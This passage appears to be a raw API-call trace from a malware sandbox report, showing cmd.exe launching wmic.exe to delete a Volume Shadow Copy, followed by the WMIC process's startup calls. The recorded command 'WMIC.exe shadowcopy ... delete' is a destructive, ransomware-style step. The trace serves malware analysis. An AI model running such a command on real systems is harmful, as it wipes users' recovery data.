0x349f30 [0093.260] GetProcessHeap () returned 0x330000 [0093.260] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x349f30) returned 0x48 [0093.260] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0093.260] GetProcessHeap () returned 0x330000 [0093.260] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xe8) returned 0x349f90 [0093.264] GetProcessHeap () returned 0x330000 [0093.264] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x349f90, Size=0x7e) returned 0x349f90 [0093.264] GetProcessHeap () returned 0x330000 [0093.264] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x349f90) returned 0x7e [0093.265] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.265] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x1eeff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eeff0) returned 0x34a020 [0093.265] GetProcessHeap () returned 0x330000 [0093.265] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x28) returned 0x3446c0 [0093.265] FindClose (in: hFindFile=0x34a020 | out: hFindFile=0x34a020) returned 1 [0093.265] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0093.265] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0093.265] GetConsoleTitleW (in: lpConsoleTitle=0x1ef540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.266] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef2f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef2b8 | out: lpAttributeList=0x1ef2f8, lpSize=0x1ef2b8) returned 1 [0093.266] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef2f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef2f8, lpPreviousValue=0x0) returned 1 [0093.266] GetStartupInfoW (in: lpStartupInfo=0x1ef410 | out: lpStartupInfo=0x1ef410*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0093.266] GetProcessHeap () returned 0x330000 [0093.266] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x20) returned 0x3446f0 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0093.266] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0093.267] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0093.267] GetProcessHeap () returned 0x330000 [0093.267] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x3446f0 | out: hHeap=0x330000) returned 1 [0093.267] GetProcessHeap () returned 0x330000 [0093.267] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x12) returned 0x348a30 [0093.267] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0093.268] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1ef330*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef2e0 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete", lpProcessInformation=0x1ef2e0*(hProcess=0x54, hThread=0x50, dwProcessId=0xa04, dwThreadId=0x9dc)) returned 1 [0093.272] CloseHandle (hObject=0x50) returned 1 [0093.272] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0093.272] GetProcessHeap () returned 0x330000 [0093.272] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34c360 | out: hHeap=0x330000) returned 1 [0093.272] GetEnvironmentStringsW () returned 0x34ad60* [0093.272] GetProcessHeap () returned 0x330000 [0093.272] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xae8) returned 0x34b850 [0093.272] FreeEnvironmentStringsW (penv=0x34ad60) returned 1 [0093.272] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0094.791] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1ef228 | out: lpExitCode=0x1ef228*=0x0) returned 1 [0094.791] CloseHandle (hObject=0x54) returned 1 [0094.791] _vsnwprintf (in: _Buffer=0x1ef498, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef238 | out: _Buffer="00000000") returned 8 [0094.791] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0094.791] GetProcessHeap () returned 0x330000 [0094.791] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34b850 | out: hHeap=0x330000) returned 1 [0094.792] GetEnvironmentStringsW () returned 0x34ad60* [0094.792] GetProcessHeap () returned 0x330000 [0094.792] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb0e) returned 0x34b880 [0094.792] FreeEnvironmentStringsW (penv=0x34ad60) returned 1 [0094.792] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0094.792] GetProcessHeap () returned 0x330000 [0094.792] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34b880 | out: hHeap=0x330000) returned 1 [0094.792] GetEnvironmentStringsW () returned 0x34ad60* [0094.792] GetProcessHeap () returned 0x330000 [0094.792] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb0e) returned 0x34b880 [0094.792] FreeEnvironmentStringsW (penv=0x34ad60) returned 1 [0094.792] GetProcessHeap () returned 0x330000 [0094.792] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x348a30 | out: hHeap=0x330000) returned 1 [0094.792] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef2f8 | out: lpAttributeList=0x1ef2f8) [0094.792] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.792] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.792] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.792] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a6de194 | out: lpMode=0x4a6de194) returned 1 [0094.792] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.792] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a6de198 | out: lpMode=0x4a6de198) returned 1 [0094.793] SetConsoleInputExeNameW () returned 0x1 [0094.793] GetConsoleOutputCP () returned 0x1b5 [0094.793] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6ebfe0 | out: lpCPInfo=0x4a6ebfe0) returned 1 [0094.793] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0094.793] exit (_Code=0) Process: id = "17" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x79145000" os_pid = "0xa04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0xb0c" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 137 os_tid = 0x9dc [0093.311] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fdd0 | out: lpSystemTimeAsFileTime=0x16fdd0*(dwLowDateTime=0x3f3c2970, dwHighDateTime=0x1d68245)) [0093.311] GetCurrentProcessId () returned 0xa04 [0093.311] GetCurrentThreadId () returned 0x9dc [0093.312] GetTickCount () returned 0x114d163 [0093.312] QueryPerformanceCounter (in: lpPerformanceCount=0x16fdd8 | out: lpPerformanceCount=0x16fdd8*=21320470723) returned 1 [0093.314] GetModuleHandleW (lpModuleName=0x0) returned 0xff260000 [0093.314] __set_app_type (_Type=0x1) [0093.314] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff2aced0) returned 0x0 [0093.314] __wgetmainargs (in: _Argc=0xff2d2380, _Argv=0xff2d2390, _Env=0xff2d2388, _DoWildCard=0, _StartInfo=0xff2d239c | out: _Argc=0xff2d2380, _Argv=0xff2d2390, _Env=0xff2d2388) returned 0 [0093.314] ??0CHString@@QEAA@XZ () returned 0xff2d2ab0 [0093.314] malloc (_Size=0x30) returned 0x4a5a50 [0093.315] malloc (_Size=0x70) returned 0x4a5a90 [0093.315] malloc (_Size=0x50) returned 0x4a7d30 [0093.315] malloc (_Size=0x30) returned 0x4a7d90 [0093.315] malloc (_Size=0x48) returned 0x4a7dd0 [0093.315] malloc (_Size=0x30) returned 0x4a7e20 [0093.315] malloc (_Size=0x30) returned 0x4a7e60 [0093.315] ??0CHString@@QEAA@XZ () returned 0xff2d2f58 [0093.315] malloc (_Size=0x30) returned 0x4a7ea0 [0093.315] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0093.315] SetConsoleCtrlHandler (HandlerRoutine=0xff2a5724, Add=1) returned 1 [0093.315] _onexit (_Func=0xff2bf378) returned 0xff2bf378 [0093.315] _onexit (_Func=0xff2bf490) returned 0xff2bf490 [0093.315] _onexit (_Func=0xff2bf4d0) returned 0xff2bf4d0 [0093.315] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0093.315] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0093.318] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0093.324] CoCreateInstance (in: rclsid=0xff2673a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff267370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff2d2940 | out: ppv=0xff2d2940*=0x1e41390) returned 0x0 [0093.331] GetCurrentProcess () returned 0xffffffffffffffff [0093.331] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16fba0 | out: TokenHandle=0x16fba0*=0xf4) returned 1 [0093.331] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16fb98 | out: TokenInformation=0x0, ReturnLength=0x16fb98) returned 0 [0093.331] malloc (_Size=0x118) returned 0x4a69a0 [0093.331] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x4a69a0, TokenInformationLength=0x118, ReturnLength=0x16fb98 | out: TokenInformation=0x4a69a0, ReturnLength=0x16fb98) returned 1 [0093.331] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x4a69a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=523978041, Attributes=0x68b0), (Luid.LowPart=0x0, Luid.HighPart=4882144, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0093.331] free (_Block=0x4a69a0) [0093.331] CloseHandle (hObject=0xf4) returned 1 [0093.332] malloc (_Size=0x40) returned 0x4a7ee0 [0093.332] malloc (_Size=0x40) returned 0x4a7f30 [0093.332] malloc (_Size=0x40) returned 0x4a7f80 [0093.332] malloc (_Size=0x20a) returned 0x4a69a0 [0093.332] GetSystemDirectoryW (in: lpBuffer=0x4a69a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0093.332] free (_Block=0x4a69a0) [0093.332] malloc (_Size=0x18) returned 0x2fdfb0 [0093.332] malloc (_Size=0x18) returned 0x4a69a0 [0093.332] malloc (_Size=0x18) returned 0x4a69c0 [0093.332] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0093.332] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0093.332] free (_Block=0x2fdfb0) [0093.332] free (_Block=0x4a69a0) [0093.332] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0093.332] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0093.332] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0093.333] FreeLibrary (hLibModule=0x77940000) returned 1 [0093.333] free (_Block=0x4a69c0) [0093.333] _vsnwprintf (in: _Buffer=0x4a7f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x16f7c8 | out: _Buffer="ms_409") returned 6 [0093.333] malloc (_Size=0x20) returned 0x4a69a0 [0093.333] GetComputerNameW (in: lpBuffer=0x4a69a0, nSize=0x16fba0 | out: lpBuffer="XDUWTFONO", nSize=0x16fba0) returned 1 [0093.333] lstrlenW (lpString="XDUWTFONO") returned 9 [0093.333] malloc (_Size=0x14) returned 0x2fdfb0 [0093.333] lstrlenW (lpString="XDUWTFONO") returned 9 [0093.333] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x16fb98 | out: lpNameBuffer=0x0, nSize=0x16fb98) returned 0x7fffffdd000 [0093.334] GetLastError () returned 0xea [0093.334] malloc (_Size=0x40) returned 0x4a69d0 [0093.334] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x4a69d0, nSize=0x16fb98 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16fb98) returned 0x1 [0093.334] lstrlenW (lpString="") returned 0 [0093.335] lstrlenW (lpString="XDUWTFONO") returned 9 [0093.335] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0093.335] lstrlenW (lpString=".") returned 1 [0093.335] lstrlenW (lpString="XDUWTFONO") returned 9 [0093.335] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0093.336] lstrlenW (lpString="LOCALHOST") returned 9 [0093.336] lstrlenW (lpString="XDUWTFONO") returned 9 [0093.336] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0093.336] lstrlenW (lpString="XDUWTFONO") returned 9 [0093.336] lstrlenW (lpString="XDUWTFONO") returned 9 [0093.336] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0093.336] free (_Block=0x2fdfb0) [0093.336] lstrlenW (lpString="XDUWTFONO") returned 9 [0093.336] malloc (_Size=0x14) returned 0x2fdfb0 [0093.336] lstrlenW (lpString="XDUWTFONO") returned 9 [0093.336] lstrlenW (lpString="XDUWTFONO") returned 9 [0093.336] malloc (_Size=0x14) returned 0x4a6a20 [0093.336] lstrlenW (lpString="XDUWTFONO") returned 9 [0093.336] malloc (_Size=0x8) returned 0x4a6a40 [0093.336] malloc (_Size=0x18) returned 0x4a6a60 [0093.336] malloc (_Size=0x30) returned 0x4a6a80 [0093.336] malloc (_Size=0x18) returned 0x4a6ac0 [0093.336] SysStringLen (param_1="IDENTIFY") returned 0x8 [0093.336] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0093.336] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0093.336] SysStringLen (param_1="IDENTIFY") returned 0x8 [0093.336] malloc (_Size=0x30) returned 0x4a6ae0 [0093.336] malloc (_Size=0x18) returned 0x4a6b20 [0093.336] SysStringLen (param_1="IMPERSONATE") returned 0xb [0093.336] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0093.337] SysStringLen (param_1="IMPERSONATE") returned 0xb [0093.337] SysStringLen (param_1="IDENTIFY") returned 0x8 [0093.337] SysStringLen (param_1="IDENTIFY") returned 0x8 [0093.337] SysStringLen (param_1="IMPERSONATE") returned 0xb [0093.337] malloc (_Size=0x30) returned 0x4a6b40 [0093.337] malloc (_Size=0x18) returned 0x4a6b80 [0093.337] SysStringLen (param_1="DELEGATE") returned 0x8 [0093.337] SysStringLen (param_1="IDENTIFY") returned 0x8 [0093.337] SysStringLen (param_1="DELEGATE") returned 0x8 [0093.337] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0093.337] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0093.337] SysStringLen (param_1="DELEGATE") returned 0x8 [0093.337] malloc (_Size=0x30) returned 0x4a6ba0 [0093.337] malloc (_Size=0x18) returned 0x4a6be0 [0093.337] malloc (_Size=0x30) returned 0x4a6c00 [0093.337] malloc (_Size=0x18) returned 0x4a6c40 [0093.337] SysStringLen (param_1="NONE") returned 0x4 [0093.337] SysStringLen (param_1="DEFAULT") returned 0x7 [0093.337] SysStringLen (param_1="DEFAULT") returned 0x7 [0093.337] SysStringLen (param_1="NONE") returned 0x4 [0093.337] malloc (_Size=0x30) returned 0x4a6c60 [0093.337] malloc (_Size=0x18) returned 0x4a6ca0 [0093.337] SysStringLen (param_1="CONNECT") returned 0x7 [0093.337] SysStringLen (param_1="DEFAULT") returned 0x7 [0093.337] malloc (_Size=0x30) returned 0x4a6cc0 [0093.337] malloc (_Size=0x18) returned 0x4a6d00 [0093.337] SysStringLen (param_1="CALL") returned 0x4 [0093.337] SysStringLen (param_1="DEFAULT") returned 0x7 [0093.337] SysStringLen (param_1="CALL") returned 0x4 [0093.337] SysStringLen (param_1="CONNECT") returned 0x7 [0093.338] malloc (_Size=0x30) returned 0x4a6d20 [0093.338] malloc (_Size=0x18) returned 0x4a6d60 [0093.338] SysStringLen (param_1="PKT") returned 0x3 [0093.338] SysStringLen (param_1="DEFAULT") returned 0x7 [0093.338] SysStringLen (param_1="PKT") returned 0x3 [0093.338] SysStringLen (param_1="NONE") returned 0x4 [0093.338] SysStringLen (param_1="NONE") returned 0x4 [0093.338] SysStringLen (param_1="PKT") returned 0x3 [0093.338] malloc (_Size=0x30) returned 0x4a6d80 [0093.338] malloc (_Size=0x18) returned 0x4a6dc0 [0093.338] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0093.338] SysStringLen (param_1="DEFAULT") returned 0x7 [0093.338] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0093.338] SysStringLen (param_1="NONE") returned 0x4 [0093.338] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0093.338] SysStringLen (param_1="PKT") returned 0x3 [0093.338] SysStringLen (param_1="PKT") returned 0x3 [0093.338] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0093.338] malloc (_Size=0x30) returned 0x4a8000 [0093.339] malloc (_Size=0x18) returned 0x4a6de0 [0093.339] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0093.339] SysStringLen (param_1="DEFAULT") returned 0x7 [0093.339] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0093.339] SysStringLen (param_1="PKT") returned 0x3 [0093.339] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0093.339] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0093.339] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0093.339] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0093.339] malloc (_Size=0x30) returned 0x4a8040 [0093.339] malloc (_Size=0x40) returned 0x4a6e00 [0093.339] malloc (_Size=0x20a) returned 0x4a6e50 [0093.339] GetSystemDirectoryW (in: lpBuffer=0x4a6e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0093.339] free (_Block=0x4a6e50) [0093.339] malloc (_Size=0x18) returned 0x4a6e50 [0093.339] malloc (_Size=0x18) returned 0x4a6e70 [0093.340] malloc (_Size=0x18) returned 0x4a6e90 [0093.340] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0093.340] SysStringLen (param_1="\\wbem\\") returned 0x6 [0093.340] free (_Block=0x4a6e50) [0093.340] free (_Block=0x4a6e70) [0093.340] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0093.340] free (_Block=0x4a6e90) [0093.340] malloc (_Size=0x18) returned 0x4a6e50 [0093.340] malloc (_Size=0x18) returned 0x4a6e70 [0093.340] malloc (_Size=0x18) returned 0x4a6e90 [0093.340] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0093.340] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0093.340] free (_Block=0x4a6e50) [0093.340] free (_Block=0x4a6e70) [0093.340] GetCurrentThreadId () returned 0x9dc [0093.341] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x16f4a0 | out: phkResult=0x16f4a0*=0xf8) returned 0x0 [0093.341] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x16f4f0, lpcbData=0x16f490*=0x400 | out: lpType=0x0, lpData=0x16f4f0*=0x30, lpcbData=0x16f490*=0x4) returned 0x0 [0093.341] _wcsicmp (_String1="0", _String2="1") returned -1 [0093.341] _wcsicmp (_String1="0", _String2="2") returned -2 [0093.341] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x16f490*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x16f490*=0x42) returned 0x0 [0093.341] malloc (_Size=0x86) returned 0x4a6eb0 [0093.341] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x4a6eb0, lpcbData=0x16f490*=0x42 | out: lpType=0x0, lpData=0x4a6eb0*=0x25, lpcbData=0x16f490*=0x42) returned 0x0 [0093.341] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0093.341] malloc (_Size=0x42) returned 0x4a6f40 [0093.341] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0093.341] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, 